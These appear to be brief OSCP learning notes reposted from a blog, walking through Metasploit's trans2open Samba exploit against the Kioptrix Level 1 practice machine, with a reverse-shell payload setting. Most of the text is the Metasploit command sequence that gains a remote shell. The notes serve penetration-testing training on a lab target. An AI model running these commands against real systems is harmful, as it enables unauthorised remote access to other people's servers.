OSCP Learning Notes - File Transfers(2)

Metasploit

Target Server: Kioptrix Level 1

(1) Start the Metasploit on Kali Linux.

(2) Set the module and options.

search trans2open

use exploit/linux/samba/trans2open 

set RHOST 10.0.0.13

show options

exploit

(3)Exploit the Kioptrix Level 1 server.(Failed)

(4)Set the payload module and try again. It works....

set payload generic/shell_reverse_tcp

(5)We can use the shell code now.

扫描二维码关注公众号,回复: 6850426 查看本文章

猜你喜欢

转载自www.cnblogs.com/keepmoving1113/p/11235103.html